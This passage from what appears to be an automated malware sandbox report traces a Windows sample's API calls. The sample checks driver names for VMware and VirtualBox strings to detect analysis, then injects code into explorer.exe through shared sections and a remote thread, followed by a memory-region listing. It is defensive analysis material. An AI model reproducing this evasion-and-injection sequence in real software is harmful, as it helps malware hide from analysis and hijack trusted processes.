_SubStr="vmrawd") returned 0x0 [0084.868] strstr (_Str="werkernel.sys", _SubStr="vmmemc") returned 0x0 [0084.868] strstr (_Str="werkernel.sys", _SubStr="vboxgu") returned 0x0 [0084.868] strstr (_Str="werkernel.sys", _SubStr="vboxsf") returned 0x0 [0084.868] strstr (_Str="werkernel.sys", _SubStr="vboxmo") returned 0x0 [0084.868] strstr (_Str="werkernel.sys", _SubStr="vboxvi") returned 0x0 [0084.868] strstr (_Str="werkernel.sys", _SubStr="vboxdi") returned 0x0 [0084.868] strstr (_Str="werkernel.sys", _SubStr="vioser") returned 0x0 [0084.869] strstr (_Str="clfs.sys", _SubStr="vmci.s") returned 0x0 [0084.869] strstr (_Str="clfs.sys", _SubStr="vmusbm") returned 0x0 [0084.869] strstr (_Str="clfs.sys", _SubStr="vmmous") returned 0x0 [0084.869] strstr (_Str="clfs.sys", _SubStr="vm3dmp") returned 0x0 [0084.869] strstr (_Str="clfs.sys", _SubStr="vmrawd") returned 0x0 [0084.869] strstr (_Str="clfs.sys", _SubStr="vmmemc") returned 0x0 [0084.869] strstr (_Str="clfs.sys", _SubStr="vboxgu") returned 0x0 [0084.869] strstr (_Str="clfs.sys", _SubStr="vboxsf") returned 0x0 [0084.869] strstr (_Str="clfs.sys", _SubStr="vboxmo") returned 0x0 [0084.869] strstr (_Str="clfs.sys", _SubStr="vboxvi") returned 0x0 [0084.869] strstr (_Str="clfs.sys", _SubStr="vboxdi") returned 0x0 [0084.869] strstr (_Str="clfs.sys", _SubStr="vioser") returned 0x0 [0084.869] strstr (_Str="tm.sys", _SubStr="vmci.s") returned 0x0 [0084.869] strstr (_Str="tm.sys", _SubStr="vmusbm") returned 0x0 [0084.870] strstr (_Str="tm.sys", _SubStr="vmmous") returned 0x0 [0084.870] strstr (_Str="tm.sys", _SubStr="vm3dmp") returned 0x0 [0084.870] strstr (_Str="tm.sys", _SubStr="vmrawd") returned 0x0 [0084.870] strstr (_Str="tm.sys", _SubStr="vmmemc") returned 0x0 [0084.870] strstr (_Str="tm.sys", _SubStr="vboxgu") returned 0x0 [0084.870] strstr (_Str="tm.sys", _SubStr="vboxsf") returned 0x0 [0084.870] strstr (_Str="tm.sys", _SubStr="vboxmo") returned 0x0 [0084.870] strstr (_Str="tm.sys", _SubStr="vboxvi") returned 0x0 [0084.870] strstr (_Str="tm.sys", _SubStr="vboxdi") returned 0x0 [0084.870] strstr (_Str="tm.sys", _SubStr="vioser") returned 0x0 [0084.870] strstr (_Str="pshed.dll", _SubStr="vmci.s") returned 0x0 [0084.870] strstr (_Str="pshed.dll", _SubStr="vmusbm") returned 0x0 [0084.870] strstr (_Str="pshed.dll", _SubStr="vmmous") returned 0x0 [0084.870] strstr (_Str="pshed.dll", _SubStr="vm3dmp") returned 0x0 [0084.870] strstr (_Str="pshed.dll", _SubStr="vmrawd") returned 0x0 [0084.870] strstr (_Str="pshed.dll", _SubStr="vmmemc") returned 0x0 [0084.870] strstr (_Str="pshed.dll", _SubStr="vboxgu") returned 0x0 [0084.870] strstr (_Str="pshed.dll", _SubStr="vboxsf") returned 0x0 [0084.870] strstr (_Str="pshed.dll", _SubStr="vboxmo") returned 0x0 [0084.871] strstr (_Str="pshed.dll", _SubStr="vboxvi") returned 0x0 [0084.871] strstr (_Str="pshed.dll", _SubStr="vboxdi") returned 0x0 [0084.871] strstr (_Str="pshed.dll", _SubStr="vioser") returned 0x0 [0084.871] strstr (_Str="bootvid.dll", _SubStr="vmci.s") returned 0x0 [0084.871] strstr (_Str="bootvid.dll", _SubStr="vmusbm") returned 0x0 [0084.871] strstr (_Str="bootvid.dll", _SubStr="vmmous") returned 0x0 [0084.871] strstr (_Str="bootvid.dll", _SubStr="vm3dmp") returned 0x0 [0084.871] strstr (_Str="bootvid.dll", _SubStr="vmrawd") returned 0x0 [0084.871] strstr (_Str="bootvid.dll", _SubStr="vmmemc") returned 0x0 [0084.871] strstr (_Str="bootvid.dll", _SubStr="vboxgu") returned 0x0 [0084.871] strstr (_Str="bootvid.dll", _SubStr="vboxsf") returned 0x0 [0084.871] strstr (_Str="bootvid.dll", _SubStr="vboxmo") returned 0x0 [0084.871] strstr (_Str="bootvid.dll", _SubStr="vboxvi") returned 0x0 [0084.871] strstr (_Str="bootvid.dll", _SubStr="vboxdi") returned 0x0 [0084.871] strstr (_Str="bootvid.dll", _SubStr="vioser") returned 0x0 [0084.872] strstr (_Str="cmimcext.sys", _SubStr="vmci.s") returned 0x0 [0084.874] strstr (_Str="cmimcext.sys", _SubStr="vmusbm") returned 0x0 [0084.874] strstr (_Str="cmimcext.sys", _SubStr="vmmous") returned 0x0 [0084.874] strstr (_Str="cmimcext.sys", _SubStr="vm3dmp") returned 0x0 [0084.875] strstr (_Str="cmimcext.sys", _SubStr="vmrawd") returned 0x0 [0084.875] strstr (_Str="cmimcext.sys", _SubStr="vmmemc") returned 0x0 [0084.875] strstr (_Str="cmimcext.sys", _SubStr="vboxgu") returned 0x0 [0084.877] strstr (_Str="cmimcext.sys", _SubStr="vboxsf") returned 0x0 [0084.877] strstr (_Str="cmimcext.sys", _SubStr="vboxmo") returned 0x0 [0084.877] strstr (_Str="cmimcext.sys", _SubStr="vboxvi") returned 0x0 [0084.877] strstr (_Str="cmimcext.sys", _SubStr="vboxdi") returned 0x0 [0084.878] strstr (_Str="cmimcext.sys", _SubStr="vioser") returned 0x0 [0084.878] strstr (_Str="ntosext.sys", _SubStr="vmci.s") returned 0x0 [0084.878] strstr (_Str="ntosext.sys", _SubStr="vmusbm") returned 0x0 [0084.878] strstr (_Str="ntosext.sys", _SubStr="vmmous") returned 0x0 [0084.878] strstr (_Str="ntosext.sys", _SubStr="vm3dmp") returned 0x0 [0084.878] strstr (_Str="ntosext.sys", _SubStr="vmrawd") returned 0x0 [0084.878] strstr (_Str="ntosext.sys", _SubStr="vmmemc") returned 0x0 [0084.878] strstr (_Str="ntosext.sys", _SubStr="vboxgu") returned 0x0 [0084.878] strstr (_Str="ntosext.sys", _SubStr="vboxsf") returned 0x0 [0084.878] strstr (_Str="ntosext.sys", _SubStr="vboxmo") returned 0x0 [0084.878] strstr (_Str="ntosext.sys", _SubStr="vboxvi") returned 0x0 [0084.878] strstr (_Str="ntosext.sys", _SubStr="vboxdi") returned 0x0 [0084.878] strstr (_Str="ntosext.sys", _SubStr="vioser") returned 0x0 [0084.878] strstr (_Str="ci.dll", _SubStr="vmci.s") returned 0x0 [0084.878] strstr (_Str="ci.dll", _SubStr="vmusbm") returned 0x0 [0084.878] strstr (_Str="ci.dll", _SubStr="vmmous") returned 0x0 [0084.879] strstr (_Str="ci.dll", _SubStr="vm3dmp") returned 0x0 [0084.879] strstr (_Str="ci.dll", _SubStr="vmrawd") returned 0x0 [0084.879] strstr (_Str="ci.dll", _SubStr="vmmemc") returned 0x0 [0084.879] strstr (_Str="ci.dll", _SubStr="vboxgu") returned 0x0 [0084.879] strstr (_Str="ci.dll", _SubStr="vboxsf") returned 0x0 [0084.879] strstr (_Str="ci.dll", _SubStr="vboxmo") returned 0x0 [0084.879] strstr (_Str="ci.dll", _SubStr="vboxvi") returned 0x0 [0084.879] strstr (_Str="ci.dll", _SubStr="vboxdi") returned 0x0 [0084.879] strstr (_Str="ci.dll", _SubStr="vioser") returned 0x0 [0084.879] strstr (_Str="msrpc.sys", _SubStr="vmci.s") returned 0x0 [0084.879] strstr (_Str="msrpc.sys", _SubStr="vmusbm") returned 0x0 [0084.879] strstr (_Str="msrpc.sys", _SubStr="vmmous") returned 0x0 [0084.879] strstr (_Str="msrpc.sys", _SubStr="vm3dmp") returned 0x0 [0084.879] strstr (_Str="msrpc.sys", _SubStr="vmrawd") returned 0x0 [0084.879] strstr (_Str="msrpc.sys", _SubStr="vmmemc") returned 0x0 [0084.879] strstr (_Str="msrpc.sys", _SubStr="vboxgu") returned 0x0 [0084.879] strstr (_Str="msrpc.sys", _SubStr="vboxsf") returned 0x0 [0084.879] strstr (_Str="msrpc.sys", _SubStr="vboxmo") returned 0x0 [0084.880] strstr (_Str="msrpc.sys", _SubStr="vboxvi") returned 0x0 [0084.880] strstr (_Str="msrpc.sys", _SubStr="vboxdi") returned 0x0 [0084.880] strstr (_Str="msrpc.sys", _SubStr="vioser") returned 0x0 [0084.880] strstr (_Str="fltmgr.sys", _SubStr="vmci.s") returned 0x0 [0084.880] strstr (_Str="fltmgr.sys", _SubStr="vmusbm") returned 0x0 [0084.880] strstr (_Str="fltmgr.sys", _SubStr="vmmous") returned 0x0 [0084.880] strstr (_Str="fltmgr.sys", _SubStr="vm3dmp") returned 0x0 [0084.880] strstr (_Str="fltmgr.sys", _SubStr="vmrawd") returned 0x0 [0084.880] strstr (_Str="fltmgr.sys", _SubStr="vmmemc") returned 0x0 [0084.880] strstr (_Str="fltmgr.sys", _SubStr="vboxgu") returned 0x0 [0084.880] strstr (_Str="fltmgr.sys", _SubStr="vboxsf") returned 0x0 [0084.880] strstr (_Str="fltmgr.sys", _SubStr="vboxmo") returned 0x0 [0084.880] strstr (_Str="fltmgr.sys", _SubStr="vboxvi") returned 0x0 [0084.880] strstr (_Str="fltmgr.sys", _SubStr="vboxdi") returned 0x0 [0084.880] strstr (_Str="fltmgr.sys", _SubStr="vioser") returned 0x0 [0084.881] strstr (_Str="ksecdd.sys", _SubStr="vmci.s") returned 0x0 [0084.881] strstr (_Str="ksecdd.sys", _SubStr="vmusbm") returned 0x0 [0084.881] strstr (_Str="ksecdd.sys", _SubStr="vmmous") returned 0x0 [0084.881] strstr (_Str="ksecdd.sys", _SubStr="vm3dmp") returned 0x0 [0084.881] strstr (_Str="ksecdd.sys", _SubStr="vmrawd") returned 0x0 [0084.881] strstr (_Str="ksecdd.sys", _SubStr="vmmemc") returned 0x0 [0084.881] strstr (_Str="ksecdd.sys", _SubStr="vboxgu") returned 0x0 [0084.881] strstr (_Str="ksecdd.sys", _SubStr="vboxsf") returned 0x0 [0084.881] strstr (_Str="ksecdd.sys", _SubStr="vboxmo") returned 0x0 [0084.881] strstr (_Str="ksecdd.sys", _SubStr="vboxvi") returned 0x0 [0084.881] strstr (_Str="ksecdd.sys", _SubStr="vboxdi") returned 0x0 [0084.881] strstr (_Str="ksecdd.sys", _SubStr="vioser") returned 0x0 [0084.881] strstr (_Str="clipsp.sys", _SubStr="vmci.s") returned 0x0 [0084.881] strstr (_Str="clipsp.sys", _SubStr="vmusbm") returned 0x0 [0084.881] strstr (_Str="clipsp.sys", _SubStr="vmmous") returned 0x0 [0084.881] strstr (_Str="clipsp.sys", _SubStr="vm3dmp") returned 0x0 [0084.881] strstr (_Str="clipsp.sys", _SubStr="vmrawd") returned 0x0 [0084.881] strstr (_Str="clipsp.sys", _SubStr="vmmemc") returned 0x0 [0084.882] strstr (_Str="clipsp.sys", _SubStr="vboxgu") returned 0x0 [0084.882] strstr (_Str="clipsp.sys", _SubStr="vboxsf") returned 0x0 [0084.882] strstr (_Str="clipsp.sys", _SubStr="vboxmo") returned 0x0 [0084.882] strstr (_Str="clipsp.sys", _SubStr="vboxvi") returned 0x0 [0084.882] strstr (_Str="clipsp.sys", _SubStr="vboxdi") returned 0x0 [0084.882] strstr (_Str="clipsp.sys", _SubStr="vioser") returned 0x0 [0084.882] strstr (_Str="wdf01000.sys", _SubStr="vmci.s") returned 0x0 [0084.882] strstr (_Str="wdf01000.sys", _SubStr="vmusbm") returned 0x0 [0084.882] strstr (_Str="wdf01000.sys", _SubStr="vmmous") returned 0x0 [0084.882] strstr (_Str="wdf01000.sys", _SubStr="vm3dmp") returned 0x0 [0084.882] strstr (_Str="wdf01000.sys", _SubStr="vmrawd") returned 0x0 [0084.882] strstr (_Str="wdf01000.sys", _SubStr="vmmemc") returned 0x0 [0084.882] strstr (_Str="wdf01000.sys", _SubStr="vboxgu") returned 0x0 [0084.882] strstr (_Str="wdf01000.sys", _SubStr="vboxsf") returned 0x0 [0084.882] strstr (_Str="wdf01000.sys", _SubStr="vboxmo") returned 0x0 [0084.882] strstr (_Str="wdf01000.sys", _SubStr="vboxvi") returned 0x0 [0084.882] strstr (_Str="wdf01000.sys", _SubStr="vboxdi") returned 0x0 [0084.882] strstr (_Str="wdf01000.sys", _SubStr="vioser") returned 0x0 [0084.883] strstr (_Str="wdfldr.sys", _SubStr="vmci.s") returned 0x0 [0084.883] strstr (_Str="wdfldr.sys", _SubStr="vmusbm") returned 0x0 [0084.883] strstr (_Str="wdfldr.sys", _SubStr="vmmous") returned 0x0 [0084.883] strstr (_Str="wdfldr.sys", _SubStr="vm3dmp") returned 0x0 [0084.883] strstr (_Str="wdfldr.sys", _SubStr="vmrawd") returned 0x0 [0084.883] strstr (_Str="wdfldr.sys", _SubStr="vmmemc") returned 0x0 [0084.883] strstr (_Str="wdfldr.sys", _SubStr="vboxgu") returned 0x0 [0084.883] strstr (_Str="wdfldr.sys", _SubStr="vboxsf") returned 0x0 [0084.883] strstr (_Str="wdfldr.sys", _SubStr="vboxmo") returned 0x0 [0084.883] strstr (_Str="wdfldr.sys", _SubStr="vboxvi") returned 0x0 [0084.883] strstr (_Str="wdfldr.sys", _SubStr="vboxdi") returned 0x0 [0084.883] strstr (_Str="wdfldr.sys", _SubStr="vioser") returned 0x0 [0084.883] strstr (_Str="acpiex.sys", _SubStr="vmci.s") returned 0x0 [0084.883] strstr (_Str="acpiex.sys", _SubStr="vmusbm") returned 0x0 [0084.883] strstr (_Str="acpiex.sys", _SubStr="vmmous") returned 0x0 [0084.883] strstr (_Str="acpiex.sys", _SubStr="vm3dmp") returned 0x0 [0084.884] strstr (_Str="acpiex.sys", _SubStr="vmrawd") returned 0x0 [0084.884] strstr (_Str="acpiex.sys", _SubStr="vmmemc") returned 0x0 [0084.884] strstr (_Str="acpiex.sys", _SubStr="vboxgu") returned 0x0 [0084.884] strstr (_Str="acpiex.sys", _SubStr="vboxsf") returned 0x0 [0084.884] strstr (_Str="acpiex.sys", _SubStr="vboxmo") returned 0x0 [0084.884] strstr (_Str="acpiex.sys", _SubStr="vboxvi") returned 0x0 [0084.884] strstr (_Str="acpiex.sys", _SubStr="vboxdi") returned 0x0 [0084.884] strstr (_Str="acpiex.sys", _SubStr="vioser") returned 0x0 [0084.884] strstr (_Str="wpprecorder.sys", _SubStr="vmci.s") returned 0x0 [0084.884] strstr (_Str="wpprecorder.sys", _SubStr="vmusbm") returned 0x0 [0084.884] strstr (_Str="wpprecorder.sys", _SubStr="vmmous") returned 0x0 [0084.884] strstr (_Str="wpprecorder.sys", _SubStr="vm3dmp") returned 0x0 [0084.884] strstr (_Str="wpprecorder.sys", _SubStr="vmrawd") returned 0x0 [0084.884] strstr (_Str="wpprecorder.sys", _SubStr="vmmemc") returned 0x0 [0084.884] strstr (_Str="wpprecorder.sys", _SubStr="vboxgu") returned 0x0 [0084.885] strstr (_Str="wpprecorder.sys", _SubStr="vboxsf") returned 0x0 [0084.885] strstr (_Str="wpprecorder.sys", _SubStr="vboxmo") returned 0x0 [0084.885] strstr (_Str="wpprecorder.sys", _SubStr="vboxvi") returned 0x0 [0084.885] strstr (_Str="wpprecorder.sys", _SubStr="vboxdi") returned 0x0 [0084.885] strstr (_Str="wpprecorder.sys", _SubStr="vioser") returned 0x0 [0084.885] strstr (_Str="cng.sys", _SubStr="vmci.s") returned 0x0 [0084.885] strstr (_Str="cng.sys", _SubStr="vmusbm") returned 0x0 [0084.885] strstr (_Str="cng.sys", _SubStr="vmmous") returned 0x0 [0084.885] strstr (_Str="cng.sys", _SubStr="vm3dmp") returned 0x0 [0084.885] strstr (_Str="cng.sys", _SubStr="vmrawd") returned 0x0 [0084.885] strstr (_Str="cng.sys", _SubStr="vmmemc") returned 0x0 [0084.885] strstr (_Str="cng.sys", _SubStr="vboxgu") returned 0x0 [0084.885] strstr (_Str="cng.sys", _SubStr="vboxsf") returned 0x0 [0084.885] strstr (_Str="cng.sys", _SubStr="vboxmo") returned 0x0 [0084.887] LocalFree (hMem=0x1db2050) returned 0x0 [0084.887] Sleep (dwMilliseconds=0x1388) [0090.002] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ff1c*=0x0, ZeroBits=0x0, RegionSize=0x19ff24*=0x5200, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x19ff1c*=0x440000, RegionSize=0x19ff24*=0x6000) returned 0x0 [0090.003] GetShellWindow () returned 0x100de [0090.004] GetWindowThreadProcessId (in: hWnd=0x100de, lpdwProcessId=0x19fec8 | out: lpdwProcessId=0x19fec8) returned 0x7b8 [0090.004] NtOpenProcess (in: ProcessHandle=0x19ff18, DesiredAccess=0x40, ObjectAttributes=0x19ff00*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19fef8*(UniqueProcess=0x7b4, UniqueThread=0x0) | out: ProcessHandle=0x19ff18*=0x15c) returned 0x0 [0090.004] NtDuplicateObject (in: SourceProcessHandle=0x15c, SourceHandle=0xffffffff, TargetProcessHandle=0xffffffff, TargetHandle=0x19ff1c, DesiredAccess=0x0, HandleAttributes=0x0, Options=0x2 | out: TargetHandle=0x19ff1c*=0x160) returned 0x0 [0090.005] NtCreateSection (in: SectionHandle=0x19fed4, DesiredAccess=0x6, ObjectAttributes=0x0, MaximumSize=0x19fed8, SectionPageProtection=0x4, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19fed4*=0x164) returned 0x0 [0090.005] NtMapViewOfSection (in: SectionHandle=0x164, ProcessHandle=0xffffffff, BaseAddress=0x19fee4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19fef0*=0x5000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19fee4*=0x450000, SectionOffset=0x0, ViewSize=0x19fef0*=0x5000) returned 0x0 [0090.005] NtMapViewOfSection (in: SectionHandle=0x164, ProcessHandle=0x160, BaseAddress=0x19feec*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19fef0*=0x5000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19feec*=0x550000, SectionOffset=0x0, ViewSize=0x19fef0*=0x5000) returned 0x0 [0093.826] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x450000, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\22eae9c51337fd8dc6d1bb281a6e1ddb9990d906076cb3e1d89887eadbdfd374.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\22eae9c51337fd8dc6d1bb281a6e1ddb9990d906076cb3e1d89887eadbdfd374.exe")) returned 0x62 [0093.826] NtCreateSection (in: SectionHandle=0x19fed0, DesiredAccess=0xe, ObjectAttributes=0x0, MaximumSize=0x19fed8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19fed0*=0x168) returned 0x0 [0093.826] NtMapViewOfSection (in: SectionHandle=0x168, ProcessHandle=0xffffffff, BaseAddress=0x19fee0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19fef0*=0x15200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19fee0*=0x460000, SectionOffset=0x0, ViewSize=0x19fef0*=0x16000) returned 0x0 [0093.826] NtMapViewOfSection (in: SectionHandle=0x168, ProcessHandle=0x160, BaseAddress=0x19fee8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19fef0*=0x16000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x20 | out: BaseAddress=0x19fee8*=0x560000, SectionOffset=0x0, ViewSize=0x19fef0*=0x16000) returned 0x0 [0093.831] RtlCreateUserThread (in: ProcessHandle=0x160, SecurityDescriptor=0x0, CreateSuspended=0, StackZeroBits=0x0, StackReserve=0x0, StackCommit=0x0, StartAddress=0x561930, Parameter=0x550000, ThreadHandle=0x19fe30*=0xc401db2048, ClientId=0x0 | out: ThreadHandle=0x19fe30*=0x16c, ClientId=0x0) returned 0x0 [0093.833] NtTerminateProcess (ProcessHandle=0xffffffff, ExitStatus=0x0) Thread: id = 4 os_tid = 0xc94 Process: id = "3" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x2ab5c000" os_pid = "0x7b4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "2" os_parent_pid = "0xffffffffffffffff" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 382 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 383 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 384 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 385 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 386 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 387 start_va = 0xe0000 end_va = 0xe1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 388 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 389 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 390 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 391 start_va = 0x1d0000 end_va = 0x1d7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "explorer.exe.mui" filename = "\\Windows\\en-US\\explorer.exe.mui" (normalized: "c:\\windows\\en-us\\explorer.exe.mui") Region: id = 392 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 393 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 394 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 395 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 396 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 397 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 398 start_va = 0x430000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 399 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 400 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 401 start_va = 0x550000 end_va = 0x554fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 402 start_va = 0x5b0000 end_va = 0x5b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 403 start_va = 0x5c0000 end_va = 0x5c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mpr.dll.mui" filename = "\\Windows\\System32\\en-US\\mpr.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mpr.dll.mui") Region: id = 404 start_va = 0x5d0000 end_va = 0x5e3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000016.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db") Region: id = 405 start_va = 0x5f0000 end_va = 0x5f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 406 start_va = 0x600000 end_va = 0x601fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 407 start_va = 0x620000 end_va = 0x680fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shell32.dll.mui" filename = "\\Windows\\System32\\en-US\\shell32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\shell32.dll.mui") Region: id = 408 start_va = 0x690000 end_va = 0x691fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 409 start_va = 0x6a0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 410 start_va = 0x6b0000 end_va = 0x837fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 411 start_va = 0x840000 end_va = 0x9c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 412 start_va = 0x9d0000 end_va = 0x1dcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009d0000" filename = "" Region: id = 413 start_va = 0x1dd0000 end_va = 0x1e4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001dd0000" filename = "" Region: id = 414 start_va = 0x1e50000 end_va = 0x1e50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e50000" filename = "" Region: id = 415 start_va = 0x1e60000 end_va = 0x1e71fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wscui.cpl.mui" filename = "\\Windows\\System32\\en-US\\wscui.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\wscui.cpl.mui") Region: id = 416 start_va = 0x1e80000 end_va = 0x1e81fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 417 start_va = 0x1e90000 end_va = 0x1e91fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 418 start_va = 0x1ea0000 end_va = 0x1ea1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "hcproviders.dll.mui" filename = "\\Windows\\System32\\en-US\\hcproviders.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\hcproviders.dll.mui") Region: id = 419 start_va = 0x1eb0000 end_va = 0x1ebafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "actioncenter.dll.mui" filename = "\\Windows\\System32\\en-US\\ActionCenter.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\actioncenter.dll.mui") Region: id = 420 start_va = 0x1ec0000 end_va = 0x1ec7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows.storage.dll.mui" filename = "\\Windows\\System32\\en-US\\windows.storage.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\windows.storage.dll.mui") Region: id = 421 start_va = 0x1ed0000 end_va = 0x1ed1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 422 start_va = 0x1ee0000 end_va = 0x1f0dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ee0000" filename = "" Region: id = 423 start_va = 0x1f10000 end_va = 0x1f11fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f10000" filename = "" Region: id = 424 start_va = 0x1f20000 end_va = 0x1f21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f20000" filename = "" Region: id = 425 start_va = 0x1f30000 end_va = 0x1f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f30000" filename = "" Region: id = 426 start_va = 0x1f40000 end_va = 0x2276fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 427 start_va = 0x2280000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = private name = 